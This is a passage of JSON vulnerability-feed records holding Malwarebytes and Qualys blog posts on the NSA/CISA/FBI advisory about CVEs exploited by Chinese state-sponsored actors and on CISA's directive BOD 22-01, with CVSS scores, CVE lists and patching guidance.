{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-21T20:10:13", "type": "avleonov", "title": "Joint Advisory AA22-279A and Vulristics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-21T20:10:13", "id": "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246", "href": "https://avleonov.com/2022/10/21/joint-advisory-aa22-279a-and-vulristics/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-10-14T00:05:09", "description": "In [a joint cybersecurity advisory](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3181261/nsa-cisa-fbi-reveal-top-cves-exploited-by-chinese-state-sponsored-actors/>), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have revealed the top CVEs used by state-sponsored threat actors from China.\n\nThe advisory aims to \"inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\"\n\nThe US and other allied nations consider China a cyber threat as it continues to target and attack companies in the US and elsewhere, with the primary aim of stealing intellectual property or gaining access to sensitive networks. The usual targets range from organizations in the IT sector, including telecommunications service providers; the [DIB (Defense Industrial Base)](<https://www.cisa.gov/defense-industrial-base-sector>) sector, which is related to military weapons systems; and other critical infrastructure sectors.\n\nIt is no surprise, then, that a majority of the CVEs revealed are for flaws allowing actors to surreptitiously and unlawfully gain access to networks. Within these networks, they establish persistence and move laterally to other connected systems.\n\nThe advisory is part of a concerted effort by US government agencies, particularly CISA, to push companies into getting on top of their patching. Part of that is getting them to patch much faster, and the other is getting them to focus on patching the vulnerabilities that threat actors are known to use.\n\nLast year, CISA [began publishing a catalog of actively exploited vulnerabilities](<https://www.malwarebytes.com/blog/news/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities>) that need ot be patched within two weeks on federal information systems. The agencies behind this latest advisory have also collaborated in the past on a list of [vulnerabilities favored by Russian state-sponsored threat actors](<https://www.malwarebytes.com/blog/news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities>).\n\nIf your organization's intellectual property is likely to be of interest to China, this is list is for you. And if it isn't, this list is still worth paying attention to.\n\n## The vunerabilities\n\n### Remote code execution (RCE)\n\nRCE flaws let attackers execute malicious code on a compromised, remote computer. The advisory identifies 12 RCEs: [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (also known as [Log4Shell or LogJam](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>)), [CVE-2021-22205](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>), [CVE-2022-26134](<https://www.malwarebytes.com/blog/news/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited>), [CVE-2021-26855](<https://www.malwarebytes.com/blog/news/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi>), [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>), [CVE-2021-26084](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>), [CVE-2022-1388](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>), [CVE-2021-40539](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26857](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26858](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>), and [CVE-2021-27065](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>).\n\n### Arbitrary file read\n\nThe advisory identifies two arbitrary file read flaws--[CVE-2019-11510](<https://www.malwarebytes.com/blog/business/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind>) and [CVE-2021-22005](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>)--which allow users or malicious programs with low privileges to read (but not write) any file on the affected system or server. Useful for stealing data.\n\n### Authentication bypass by spoofing\n\n[CVE-2022-24112](<https://nvd.nist.gov/vuln/detail/CVE-2022-24112>) is an authentication bypass flaw that allows attackers to access resources they shouldn't have access to by spoofing an IP address.\n\n### Command injection\n\n[CVE-2021-36260](<https://www.malwarebytes.com/blog/news/2022/08/thousands-of-hikvision-video-cameras-remain-unpatched-and-vulnerable-to-takeover>) is a command injection flaw that allows attackers to execute commands of their own choosing on an affected system. A vulnerable app is usually involved in such attacks.\n\n### Command line execution\n\n[CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) is a command injection flaw that allows attackers to inject data into an affected system's command line.\n\n### Path Traversal\n\nAlso known as \"directory traversal,\" these flaws allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like `../` into file or directory paths. [CVE-2019-19781](<https://www.malwarebytes.com/blog/news/2021/06/atomic-research-institute-breached-via-vpn-vulnerability>), [CVE-2021-41773](<https://www.malwarebytes.com/blog/news/2021/10/apache-http>), and [CVE-2021-20090](<https://www.malwarebytes.com/blog/news/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago>) are all forms of path traversal attack.\n\n## Mitigations\n\nThe NSA, CISA, and FBI urge organizations to undertake the following mitigations:\n\n * * Apply patches as they come, prioritizing the most critical l flaws in your environment.\n * Use multi-factor authentication.\n * Require the use of strong, unique passwords.\n * Upgrade or replace software or devices that are at, or close to, their end of life.\n * Consider adopting a [zero-trust security model](<https://www.malwarebytes.com/blog/news/2020/01/explained-the-strengths-and-weaknesses-of-the-zero-trust-model>).\n * Monitor and log Internet-facing systems for abnormal activity.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-13T16:15:00", "type": "malwarebytes", "title": "Chinese APT's favorite vulnerabilities revealed", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-13T16:15:00", "id": "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "href": "https://www.malwarebytes.com/blog/news/2022/10/psa-chinese-apts-target-flaws-that-take-full-control-of-systems", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-10-12T20:01:11", "description": "On October 6, 2022, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>) on the Chinese government\u2014officially known as the People\u2019s Republic of China (PRC) states-sponsored cyber actors' activity to seek national interests. These malicious cyber activities attributed to the Chinese government targeted, and persist to target, a mixture of industries and organizations in the United States. They provide the top CVEs used since 2020 by the People's Republic of China (PRC) states-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). The PRC malicious actor continues to exploit known vulnerabilities to target U.S. and vigorously allied networks and software and hardware companies to rob intellectual property and develop access to sensitive networks. \n\nThey stated that PRC state-sponsored cyber activities as one of the most significant and dynamic threats to U.S. government and civilian networks. The PRC state-sponsored cyber actors persist in targeting government and critical infrastructure networks with an increasing array of new and adaptive techniques. Some could pose a considerable risk to Information Technology Sector, telecommunications organizations, Defense Industrial Base (DIB) Sector, and other critical infrastructure organizations. \n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target victims. Here is a list of 20 publicly known vulnerabilities (CVEs) published by the NSA, along with affected products and associated Qualys VMDR QID(s) for each vulnerability: \n\n**Vendor**| **CVE**| **Vulnerability Type**| Qualys **QID**(s) \n---|---|---|--- \n| | | \nApache Log4j | CVE-2021-44228 | Remote Code Execution | 730302, 150441, 150440, and more \nPulse Connect Secure | CVE-2019-11510 | Arbitrary File Read | 38771 \nGitLab CE/EE | CVE-2021-22205 | Remote Code Execution | 375475 \nAtlassian | CVE-2022-26134 | Remote Code Execution | 730514, 376657, 150523 \nMicrosoft Exchange | CVE-2021-26855 | Remote Code Execution | 50107, 50108 \nF5 Big-IP | CVE-2020-5902 | Remote Code Execution | 38791, 373106 \nVMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload | 216265, 216266 \nCitrix ADC | CVE-2019-19781 | Path Traversal | 372685, 150273, 372305 \nCisco Hyperflex | CVE-2021-1497 | Command Line Execution | 730070 \nBuffalo WSR | CVE-2021-20090 | Relative Path Traversal | NA \nAtlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution | 150368, 375839, 730172 \nHikvision Webserver | CVE-2021-36260 | Command Injection | NA \nSitecore XP | CVE-2021-42237 | Remote Code Execution | 14012 \nF5 Big-IP | CVE-2022-1388 | Remote Code Execution | 150511, 730489, 376577 \nApache | CVE-2022-24112 | Authentication Bypass by Spoofing | 730361 \nZOHO | CVE-2021-40539 | Remote Code Execution | 375840 \nMicrosoft | CVE-2021-26857 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-26858 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-27065 | Remote Code Execution | 50107 \nApache HTTP Server | CVE-2021-41773 | Path Traversal | 150373, 150372, 710595 and more \nTable 1: Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\nNSA stated that the threat actors use virtual private networks (VPNs) to obscure their activities and establish initial access. Multiple CVEs indicated in Table 1 let the actors stealthily acquire unauthorized access into sensitive networks, after which they pursue to develop persistence and reposition laterally to other internally connected networks. \n\nThe NSA highlights how the People\u2019s Republic of China (PRC) has targeted and compromised significant telecom establishments and network service providers mostly by exploiting publicly known vulnerabilities. Networks affected have varied from small office/home office (SOHO) routers to medium and large enterprise networks. \n\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. The devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as means to conduct network intrusions on other entities. Furthermore, cyber defenders often overlook these devices, who work to maintain and keep pace with frequent software patching of Internet-facing services and endpoint devices. \n\n## Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0 \n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), Vulnerabilities tab by using the following QQL query: \n\n_vulnerabilities.vulnerability.cveIds: [CVE-2021-44228, CVE-2019-11510, CVE-2021-22205, CVE-2022-26134, CVE-2021-26855, CVE-2020-5902, CVE-2021-22005, CVE-2019-19781, CVE-2021-1497, CVE-2021-20090, CVE-2021-26084, CVE-2021-36260, CVE-2021-42237, CVE-2022-1388, CVE-2022-24112, CVE-2021-40539, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-41773]_ \n\n\n\nUsing, [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), you can also effectively prioritize these vulnerabilities using the [Qualys TruRisk](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>).\n\n\n\n## Identify Vulnerable Assets using Qualys Threat Protection \n\nIn addition, you can locate vulnerable hosts through Qualys Threat Protection by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability. \n\n\n\nUsing the Qualys Unified Dashboard, you can track, impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment. \n\nRead the Article (Qualys Customer Portal): [NSA Top Exploited CVEs | China State Actors](<https://success.qualys.com/support/s/article/000007011>) \n\n\n\n## Recommendations & Mitigations \n\nThe NSA, CISA, and FBI recommend U.S. and allied governments, critical infrastructure, and private sector organizations use the mitigation guidance provided to boost their defensive posture and decrease the threat of compromise from PRC state-sponsored threat cyber actors. \n\nHere is a summary of mitigations guidance provided by the NSA: \n\n * Update, prioritize and patch vulnerable systems as soon as possible, as listed in this article and the list provided by [CISA KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n * Utilize phishing-resistant multi-factor authentication and require all accounts with a unique and strong password. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices. \n * Move toward the Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\nOne of the soundest methods that organizations of all sizes could stay on top of these vulnerabilities and end-of-life (EOL) network/device infrastructure as noted by NSA general mitigations guidelines is to catalog the infected assets and apply patches as soon as possible. This could be an effortless process if the corps utilize the power of Qualys VMDR 2.0. You can start your [Qualys VMDR 2.0 trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting, and patching the high-priority commonly exploited vulnerabilities. \n\n## Contributors\n\n * Felix Jimenez Saez, Director, Product Management, Qualys\n * Swapnil Ahirrao, Principal Product Manager, VMDR, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-07T20:03:01", "type": "qualysblog", "title": "NSA Alert: Topmost CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-07T20:03:01", "id": "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732\u2032,'CVE-2020-1350\u2032,'CVE-2020-1472\u2032,'CVE-2021-26855\u2032,'CVE-2021-26858\u2032,'CVE-2021-27065\u2032,'CVE-2020-0601\u2032,'CVE-2021-26857\u2032,'CVE-2021-22893\u2032,'CVE-2020-8243\u2032,'CVE-2021-22900\u2032,'CVE-2021-22894\u2032,'CVE-2020-8260\u2032,'CVE-2021-22899\u2032,'CVE-2019-11510']\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", 